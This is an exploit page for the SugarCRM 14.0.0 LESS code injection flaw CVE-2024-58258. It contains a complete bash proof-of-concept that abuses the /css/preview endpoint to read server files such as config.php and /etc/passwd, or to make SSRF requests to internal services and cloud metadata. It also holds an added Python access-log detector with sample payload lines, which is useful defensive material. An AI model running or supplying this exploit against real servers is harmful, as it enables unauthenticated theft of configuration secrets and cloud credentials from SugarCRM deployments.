SugarCRM 14.0.0 SSRF and Code Injection Vulnerability: Exploit Analysis

This article analyses the SSRF and code injection vulnerability CVE-2024-58258 in SugarCRM 14.0.0: how the vulnerability works, which versions are affected, how it is exploited, and the PoC code, so that security researchers can understand and defend against this class of attack.

Exploit for SugarCRM 14.0.0 - SSRF/Code Injection CVE-2024-58258

2025-07-16 | CVSS 7.2

https://sploitus.com/exploit?id=EDB-ID:52365

Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection

Author: Egidio Romano aka EgiX

Email : n0b0d13s@gmail.com

Software Link: https://www.sugarcrm.com

Affected Versions: All commercial versions before 13.0.4 and 14.0.1.

CVE Reference: CVE-2024-58258

Vulnerability Description:

User input passed through GET parameters to the /css/preview REST API endpoint is not properly sanitized before being parsed as LESS code. A remote, unauthenticated attacker can exploit this to inject and execute arbitrary LESS directives. By abusing the @import LESS statement, the attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary local files on the web server, potentially leading to the disclosure of sensitive information.

Proof of Concept:

#!/bin/bash

echo "+----------------------------------------------------------------------+"
echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |"
echo "+----------------------------------------------------------------------+"

if [ "$#" -ne 2 ]; then
    echo -ne "\nUsage.....: $0 \n"
    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
    exit 1
fi

# Percent-encode every byte as %XX so the LESS syntax survives the query string unchanged.
urlencode() {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
}

# "1;" terminates the LESS statement the parameter value lands in, the first inline import
# reads the target file or URL, the second inline import of a data: URI adds a "________"
# delimiter after the fetched content, and "//" comments out whatever follows on that line.
INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}")

# The success marker used in the original copy of this script was lost when the page was
# extracted (the grep and sed patterns arrived empty). The "________" delimiter injected
# above is used in its place here: it only shows up in the response when the injected LESS
# was compiled, and everything printed before it is the content of the fetched file or URL.
if echo "$RESPONSE" | grep -q '________'; then
    echo -e "\nOutput for '$2':\n"
    echo "$RESPONSE" | sed '/________/q' | grep -v '________'
    echo
else
    echo -e "\nError: exploit failed!\n"
    exit 2
fi
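The PoC percent-encodes every byte of the payload, so a grep for "@import" or "/etc/passwd" over raw web-server access logs finds nothing; the query string has to be decoded first. The following Python is an added example, not part of the original advisory or of SugarCRM: it decodes the query string of a few constructed combined-format access-log lines (the log lines, the theme-variable name PrimaryButton, and the bounded double-decoding depth are assumptions) and flags requests to the css/preview endpoint whose parameter values contain LESS syntax rather than a single plain value.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus, urlsplit


def hex_urlencode(s: str) -> str:
    """Mirror of the PoC's urlencode(): every byte becomes %XX (lowercase hex)."""
    return "".join(f"%{b:02x}" for b in s.encode())


# Same payload shape as the PoC, targeting /etc/passwd.
PAYLOAD = "1; @import (inline) '/etc/passwd'; @import (inline) 'data:text/plain,________';//"

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 1 carries the PoC's fully hex-encoded payload, line 3 a '+'-encoded variant
# aimed at the cloud metadata service, lines 2 and 4 are benign (a colour override
# for an assumed theme variable name, and an unrelated request).
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [16/Jul/2025:10:01:02 +0000] "GET /sugarcrm/rest/v10/css/preview'
    '?baseUrl=1&param=' + hex_urlencode(PAYLOAD) + ' HTTP/1.1" 200 5123 "-" "curl/8.5.0"',
    '10.0.0.6 - - [16/Jul/2025:10:01:03 +0000] "GET /sugarcrm/rest/v10/css/preview'
    '?baseUrl=1&PrimaryButton=%23ff0000 HTTP/1.1" 200 4201 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [16/Jul/2025:10:01:04 +0000] "GET /sugarcrm/rest/v10/css/preview'
    "?baseUrl=1&param=1;@import+(inline)+'http://169.254.169.254/latest/meta-data/';//"
    ' HTTP/1.1" 200 900 "-" "python-requests/2.31.0"',
    '10.0.0.8 - - [16/Jul/2025:10:01:05 +0000] "GET /sugarcrm/index.php?module=Home'
    ' HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PREVIEW_PATH = re.compile(r"/rest/v\d+/css/preview$")

# LESS syntax that has no business in a single theme-variable value.
INDICATORS = {
    "less-import": re.compile(r"@import\b", re.IGNORECASE),
    "statement-terminator": re.compile(r";"),
    "line-comment": re.compile(r"//"),  # also fires on the "://" of a URL
    "data-uri": re.compile(r"\bdata:", re.IGNORECASE),
    "url-scheme": re.compile(r"\b[a-z][a-z0-9+.-]*://", re.IGNORECASE),
}


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so double-encoded payloads are seen too; depth is an assumption."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query: str) -> list:
    """Split on '&' only and decode each side; avoids parse_qs's historical ';' splitting."""
    pairs = []
    for item in query.split("&"):
        if not item:
            continue
        name, _, value = item.partition("=")
        pairs.append((unquote_plus(name), fully_decode(value)))
    return pairs


def inspect_line(line: str) -> Optional[dict]:
    """Return an alert dict for a css/preview request carrying LESS syntax, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not PREVIEW_PATH.search(parts.path):
        return None
    hits = []
    for name, value in parse_query(parts.query):
        matched = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            hits.append({"param": name, "value": value, "indicators": matched})
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"), "hits": hits}


def scan(log_text: str) -> list:
    """Run inspect_line over every line and collect the alerts."""
    return [a for a in (inspect_line(l) for l in log_text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        for hit in alert["hits"]:
            print(f"{alert['ts']} {alert['ip']} param={hit['param']} "
                  f"indicators={','.join(hit['indicators'])} value={hit['value']!r}")
```

Every parameter of the request is inspected, not only "param", because the advisory attributes the flaw to the endpoint's GET parameters in general; a legitimate theme-variable value such as a colour never contains a ";" or an "@import", so either is enough to alert on, and the decoded value is kept in the alert so an analyst can see the file or URL that was requested.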

Credits: Vulnerability discovered by Egidio Romano.

Original Advisory: http://karmainsecurity.com/KIS-2025-04

Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/
